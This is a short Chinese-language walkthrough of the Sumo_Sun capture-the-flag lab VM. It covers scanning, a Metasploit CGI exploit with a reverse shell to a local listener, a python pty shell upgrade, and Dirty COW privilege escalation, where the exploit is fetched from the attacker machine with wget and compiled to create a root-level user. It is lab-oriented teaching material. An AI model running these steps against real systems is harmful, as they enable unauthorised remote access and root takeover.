-
机器名称:Sumo_Sun*
-
难度:初级
-
测试:VMware Workstation 15.x Pro以上
-
目标: 获取根外壳,即(root@localhost:~#),然后在 /root 下获取标志)。
1.内网渗透
先利用namp扫描整个网段,找出靶机的IP为192.168.179.117
2.端口扫描
扫描所有开放的端口,找出的开放端口为80,22
根据对应的端口,找到可能存在的漏洞,没发现漏洞
nmap --script=vuln -p80 192.168.179.117
3.扫描指纹
要下载插件扫描指纹信息,用kali自带的whatweb插件,apache版本为2.2.22
4.目录扫描
通过dirb遍历一下其可能存在的站点,发现了三个站点,但是排查完发现没什么用
5.漏洞扫描
nikto 扫描网站漏洞,发现了一个漏洞
nikto -h http://192.168.179.117
用msf查找一下漏洞,发现有几个模块可以利用
设置参数,利用模块进行攻击,需要设置的参数
set rhosts 192.168.179.117(目标主机)
set TARGETURI /cgi-bin/test
set lhost 192.168.179.131(本机)
set lport 4444(监听端口)
设置完参数后run进行攻击,如图说明攻击成功,当前账户为www-data,由于没有回显,利用python构造一个回显
python -c 'import pty; pty.spawn("/bin/bash")'
6.漏洞提权
Ubuntu12.04 可以使用脏牛进行内核提权,searchsploit查找dirtycow漏洞,将漏洞源码40839.c复制到当前的文件夹下
将40839.c重命名dirty.c到html目录下,开启apache2功能,目的是让攻击机能够下载dirty.c
在攻击机上通过wget下载dirty.c,然后给文件提权
使用 GCC 编译器编译名为 "dirty.c" 的源代码文件,并生成可执行文件 "dirty",执行文件dirty,密码设置为123456,用户名为firefart
切换到firefart用户下,密码为123456,然后切换到主目录下,ls发现文件root.txt,cat一下发现flag
7.总结
该漏洞环境主要是复现脏牛漏洞dirty cow,先通过msf查找漏洞后进行利用,再用dirty cow进行提权